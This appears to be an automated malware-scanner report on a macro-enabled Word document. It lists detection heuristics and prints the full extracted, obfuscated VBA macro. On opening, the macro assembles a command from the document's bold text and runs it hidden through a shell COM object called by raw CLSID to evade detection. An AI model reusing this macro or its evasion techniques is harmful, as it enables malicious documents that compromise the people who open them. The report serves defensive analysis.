MALICIOUS
172
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9191 bytes |
SHA-256: 0e23bc3efe4d74472497cbc10e6ea02901865f2b45c4a6a1e9aa6ca5a90e3797 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
132 of 219 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim bprjmfp As String
Private Sub Document_Open()
Call nmngtyy
End Sub
Private Sub nmngtyy()
LLLLL
End Sub
Public Sub LLLLL()
If Cos(76.8765) = Log(12.42555) Then
Else
Call AsNXaUrp.BYsZgTqOo
End If
End Sub
Attribute VB_Name = "AsNXaUrp"
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zridde = 21
#Else
Private Declare Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const crktbpnl = 1732
Private Declare PtrSafe Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const szdunbvk = 6
#Else
Private Declare Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const aorxbcpilpy = 57
Private Declare Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type kdkota
fcjwktwr As Long
End Type
#If VBA7 Then
#Else
#End If
Sub DqMhJ(sgbwvbShKbOgrjzLSSZZQhbQpEaAykA, GSbmTltgFLIfrxWxjSA, GqUKFLGqBSjabuZZHNsgZsTEZvYsidQf, ONQyRgIfCfnciExYxpVaULNWPkJmOIY)
pgkAXMgbrqbTknuFPCzuigXV = 4.59820241332336E+16
tHmZrsQOWzpqToBqn = 3977312751#
SLuXkGxbJhPrJIOjdFtCzyKFNnFPvOyDvmEKXVW = "bPjizfqgbkKvwluUApKxBiguiLwW"
DLIiNbk = 3.76284590276884E+17
bFiwYnKECHKskKi = "ZftiozniUcXYC"
End Sub
Function aApiHzWUbLcCKwUXRtUUtS(jKJFYjbAcuWpgE, dTtdwIihBabSzcwPlCpXzifmzjYCzMyTj, qJevFEAcIewQcYgelnrgmuoHeMkfipcIjClnlpwkX)
nhZnt = "vqGJOUnRwEkJNOQfgspSNYDQCdHyBAhMdbfVWt"
bhGUojLgElIBgyafWmqGlMoPvWXfmivJnxNlHDPg = 9.49581882866512E+33
xDMtyBOCwJigmKPsqYRLftWqyNjkpXSXJOnJc = 14382074147258#
wVJdpYNdAnxsQexUMDgW = 9604
aApiHzWUbLcCKwUXRtUUtS "lRdNYqKWXWGQVcvCCExdUMwnwGnaoCkcFaLEfPQi"
End Function
Function inojHpczhB(GcRrcv, BSKzjt, YVqQSCkiVldKvQrXmnOaNjev, LlYWrlsMznioyyfSYHf, SAmKuYMUSMoqvx, RLMdAlyvd)
yNbTZYtmystB = 8.8252890304889E+40
NGMdfcUEJBMkXlLXMrNwvTxkJbNEIeQplxVBc = "UFgGpMPjBmiPmAfFvuIbTDPPvekWyaPJvNXIPodlVaZ"
WtsQJgBasAfQpQLKbskbXYTY = "XpHQWGseptBmUNSYoRuiHSydTK"
qxDxZTmlrtKVtmmAXJXGfSCiH = "qWFqdxMeCgmvbTibaeevAwU"
bTvDwYvUqAcQgAQMJP = 2.11947875618804E+29
GObhEYErYDLYuBmPKBIhelRFbqRuaOR = "lMOEzmrfsgWRebiOulFLAiFUxWGNGKRJl"
nhmiPYJcpxOzazICzpIGmCG = "HdfeYhPNfGoAcLVhBXtIGxwHEEKbAemkatbmsfE"
hAUUKIanT = 6.56754623326837E+16
inojHpczhB "FOJymJgYaUXoNATDZjkipVTm"
End Function
Function ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt(GccwvdWHZZYbcGRGTFjktnUA, irDlljuXX, gEcerAgnbubwdScWQkBiTIboNlTWo, dEFZkBrbrjNzsFfmOkIPTKVpNYcnRFhJzlR, rDiaepsSUTPVIaXiNZVTj, LMYDJmCDzHoIuKCh, dSDUtIGeqiyvaPynbrVCbfGPRUIhAgM, fosBgvSESYTEDHZrqVTSgfIyLnCZ)
ntPvFmKbseihzwb = "PFdHOmgNrJCSaRGxxQ"
AkEaHeRANVLtMHSbiplABMB = 5.8053604064415E+41
wjrBaYl = "jXbiLfWcwlTrgPpKHpYHMQXnizdXnPZ"
kbKpgkQCTJDPtKYhugulzdXTznzLCyphMdG = 1.89387594832126E+19
EzeWZWn = "MHuXbv"
GVoqHDqqskEAVTWDPETduCXLdq = 93839194
GrtbkGViLXnzBNJllUVS = "qEeTISiExcNQikyzIUuzlKfcERPkQl"
HXmQnOIbnmeNuaiTdLmdzbSxfYCPqDxoMlFtv = "KkAtGNGwkCWxlZdIrg"
olPMtkkp = 3681689
BJUpXKACcGVFrinzssSYKDuZnHivXHIVXQub = "gaaYbfkLAxCbMAsSRfyOvBQcFeVyz"
anLSMSrzjXJOnJfTKHQDGkwNmfJyT = "KmLSWPQunZbRvaEhNHxmUNhwapqyghJsgnNXCUmQ"
ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt "QTqboo"
End Function
Function SfyUUwUYL(JERCBgbwEPsgYSOGQilIM, ftUgjEurUlBUobPGrzLQSmcFrkBMa, DgJcZYhUxXCNvGfEdnqJrmwvNsQOpyChRaiUKM, rZXCo, FrVanHOVQCRkNOh)
QlykUjIhIBvoBrnLAYRkwyUkGrDTuJWwOtqdXfh = "cgGfLedGgIvvHaySROecgomyfyZIB"
oUqjIProZbOx = "mNapovXLJBFBnuHAMEUFWTbEXSibdoCNi"
AlEJl = "dzfTliUVknMXtr"
SmVSVMwiUyrSltWw = 3050345767935#
SHbXoI = "oxNqpcfUrlhyirPBhQL"
tQibNrIEmQtedBdYyFs = 5.74262107653575E+21
SfyUUwUYL "TXbALXNMCGuGdnaXOlcyTaibsDUhNrCbXSBVpi"
End Function
Public Sub BYsZgTqOo()
On Error Resume Next
'gcpuihphsepfpgogkj7312ywozbarf
'mtthrkhhhgvopebj
Dim sepfpgogkj As Integer
'qdibjmpibvmljm35430
'9797
Do Until 6418 = 6418
Dim sjptydjepcn As Object
Randomize
Loop
'wqwokhnttlnmcbtcxkgvrlszquvd
'sjptydjepcnwdurmdcksvjttstlnmcbtcxkgvrlszquvd
'njpbumksvjttsskkqxayybe
'bvmljmsepfpgogkj35430
'ujpmmmqx7312
'dosubfbujpmmmqx18947887
'7312qdibjmpi
'1397
'35430sepfpgogkj
'gkkxippbskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'lrmhewbgkgvrlszquvdtlnmcbtcxkgvrlszquvd
'cbntlfvhfwqwokhnthxtzrsnpmzwdurmdc
'tlnmcbtcxkgvrlszquvdtlnmcbtcxkgvrlszquvd
'skkqxayybelrmhewbgkgvrlszquvd
'qdibjmpi
'eghiudyujpmmmqx#Q14
'oocetwtwbcl
'18947887ujpmmmqx
If oocetwtwbcl = "cocmmxx" Then
Dim eghiudy
oocetwtwbcl = 93818056901864#
End If
'xpvcipksvjttsksvjttskgvrlszquvdskkqxayybe
'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'fhnwguikgvrlszquvdkgvrlszquvdskkqxayybe
'wdurmdcwqwokhntgkkxippbskkqxayybe
'ksvjttswqwokhntlrmhewbgkgvrlszquvd
If IsDate(qhlgnpxqdz) And ((13 + 7312) / (18947887 + 7473870)) <> 45815829311408# Then
xbqddutl = "mncwnt" & CStr("bpuqctlfa")
End If
'qnowqrdhksvjttsgkkxippbskkqxayybe
'hxtzrsnpmzwdurmdcgkkxippbskkqxayybe
'ywozbarfQ14
'hgvopebjQ11
Dim myShape As InlineShape
Dim myRange As Range
For Each myRange In ActiveDocument.StoryRanges
For Each myShape In myRange.InlineShapes
myShape.Delete
Next myShape
Next myRange
Dim zxd As Variant
Dim zxtgsaqeyhzfgds3re As String
Dim oRng As Range
Dim oNewRng As Range
Set oRng = Selection.Range '(the formatted range you are wanting to write)
oRng.MoveEndWhile Chr(Abs(-32.1)), wdBackward 'Remove trailing spaces from the range
Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written
oNewRng.Collapse wdCollapseEnd
'oNewRng.FormattedText = oRng 'then write it.
Dim Para As Paragraph
Dim i As Long
Application.ScreenUpdating = False
With ActiveDocument
For i = .Paragraphs.Count To 1 Step -1
Set Para = .Paragraphs(i)
With Para
If .Range.End - .Range.Start = 1 Then
.Range.Delete
Else
.SpaceBefore = 6
.SpaceAfter = 6
End If
End With
Next i
End With
Application.ScreenUpdating = True
Dim singleLine As Paragraph
Dim rng As Range
Dim pos As Integer
Dim Wrd As Range
For Each singleLine In ActiveDocument.Paragraphs
Set rng = singleLine.Range
If rng.Font.Bold Then
'MsgBox "This is bold"
lineText = singleLine.Range.Text
AWtbWDhas = AWtbWDhas + lineText
' MsgBox (AWtbWDhas)
End If
Next
WpkbB = "xOKhf"
fE = "JCT"
TDOvQ = "F"
vWYYg = 3561180
HKODnr = "ok"
YmBx = 4533856
Ddyd = "dUC"
TahIc = "QzrXkG"
ZFF = Null
VCFGv = ZFF
If Sin(2) + Cos(7.46) - 976.7654 = Cos(272) * 75.557 Then
MsgBox (CoNjMfBs)
Else
Do Until "LGRLh" <> "zslnu"
xZZI = "giQ"
xuTFy = 32437
XPK = 9889
rleIH = 552
rQSE = 774
nKtIZbQ = "ZoV"
xNLxG = "RbdaLC"
SRRmTQ = "MnK"
awYoHE = "nVKhuv"
lgAd = "Mzq"
LGRLh = zslnu
Loop
AWtbWDhas = Replace(AWtbWDhas, "dxphwrs", "")
End If
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Dim k2 As String
k2 = "Win32_ProcessStart" & "u" & "p"
Set objStartUp = objWMIService.Get(k1)
Set objProc = objWMIService.Get("Win32_Process")
Dim obj1
Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
obj1.Run Gravity & "" & AWtbWDhas, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 31744 bytes |
SHA-256: 7f72bfa6536173c671f749e89c711e1b07842d97f628ac9c833b0b63d1b8e437 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
339 of 525 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.